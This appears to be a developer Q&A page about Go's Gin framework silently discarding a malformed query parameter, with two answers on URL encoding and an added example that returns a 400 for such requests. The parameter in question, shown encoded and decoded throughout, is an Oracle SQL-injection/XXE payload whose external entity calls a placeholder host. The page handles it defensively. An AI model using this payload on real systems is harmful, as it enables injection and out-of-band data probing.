Missing query parameter in request
Question
Running the following go code:
    package main

    import (
        "fmt"

        "github.com/gin-gonic/gin"
    )

    func main() {
        r := gin.Default()
        r.GET("/", func(c *gin.Context) {
            qParam, ok := c.GetQuery("fromDate") // qParam is nil
            query := c.Request.URL.Query()       // query is empty
            rawQuery := c.Request.URL.RawQuery   // contains the parameter
            fmt.Println(qParam, ok, query, rawQuery)
            c.JSON(200, gin.H{
                "message": "pong",
            })
        })
        r.Run("localhost:8181")
    }
With the following query parameter, golang seems to not be returning it:
fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3c!DOCTYPE%20root%20[%3c!ENTITY%20%%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3e%xxx%3b]%3e'),'%2fl')
Although it is present in the URL.RawQuery:
[debug screenshot]
I need to access this value so I can validate it and return an error code, but as it is returned as nil I cannot do that.
Answer 1
Score: 1
Gin c.Query() and URL.Query() are the same:
> Query returns the keyed url query value if it exists, otherwise it returns an empty string (""). It is shortcut for c.Request.URL.Query().Get(key)
And URL.Query() silently discards invalid params.
The query param you showed above is invalid. You should properly escape the original string before calling the server endpoint.
If this is not under your control, you may just be out of luck. You could attempt fixing the raw param, but that is arbitrary and not scalable.
For the record, this is what your original query string might look like:
{base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY xxx SYSTEM {base}"http://{domain}/ext1"> xxx;]>'),'/l')
Answer 2
Score: 1
If your original query string is:
fromDate={base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM {base}"http://{domain}/ext1">%xxx;]>'),'/l')
then you should encode the query like this (I don't think it is a good way):
fromDate=%7bbase%7d%7c%7cextractvalue(xmltype(%27%3C!DOCTYPE%20root%20[%3C!ENTITY%20%25%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3E%25xxx%3b]%3E%27),%27%2fl%27)
because the '%' in your original string was encoded as '%' not '%25' so the '%%' would be parsed with error.
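Added example, not part of either answer or of Gin's own code: one way to reject the malformed query with a 400 instead of losing it is to call url.ParseQuery on RawQuery yourself, since it returns the error that URL.Query() discards. The helper names (strictQueryParam, statusFor, newReq) are hypothetical, and the YYYY-MM-DD format for fromDate is an assumption; in a Gin handler you would pass c.Request.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/url"
	"time"
)

var errMissing = errors.New("missing query parameter")

// pageQuery is the raw query string quoted in the question.
const pageQuery = "fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3c!DOCTYPE%20root%20[%3c!ENTITY%20%%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3e%xxx%3b]%3e'),'%2fl')"

// strictQueryParam parses RawQuery directly. r.URL.Query() runs the same
// parser but throws the error away and drops the malformed pair.
func strictQueryParam(r *http.Request, key string) (string, error) {
	values, err := url.ParseQuery(r.URL.RawQuery)
	if err != nil {
		return "", fmt.Errorf("malformed query string: %w", err)
	}
	vals, ok := values[key]
	if !ok || len(vals) == 0 {
		return "", errMissing
	}
	return vals[0], nil
}

// statusFor returns the HTTP status a handler should send for this request.
// Assumption: fromDate is a YYYY-MM-DD date; the page does not state the format.
func statusFor(r *http.Request) int {
	v, err := strictQueryParam(r, "fromDate")
	if err != nil {
		return http.StatusBadRequest // bad percent-escape or parameter absent
	}
	if _, err := time.Parse("2006-01-02", v); err != nil {
		return http.StatusBadRequest // decoded fine, but not a date
	}
	return http.StatusOK
}

// newReq builds a request as the handler sees it: RawQuery is kept verbatim.
func newReq(rawQuery string) *http.Request {
	return &http.Request{URL: &url.URL{Path: "/", RawQuery: rawQuery}}
}

func main() {
	bad := newReq(pageQuery)
	_, err := strictQueryParam(bad, "fromDate")
	fmt.Println(len(bad.URL.Query()), err, statusFor(bad))
	fmt.Println(statusFor(newReq("fromDate=2024-01-31"))) // constructed valid input
}
```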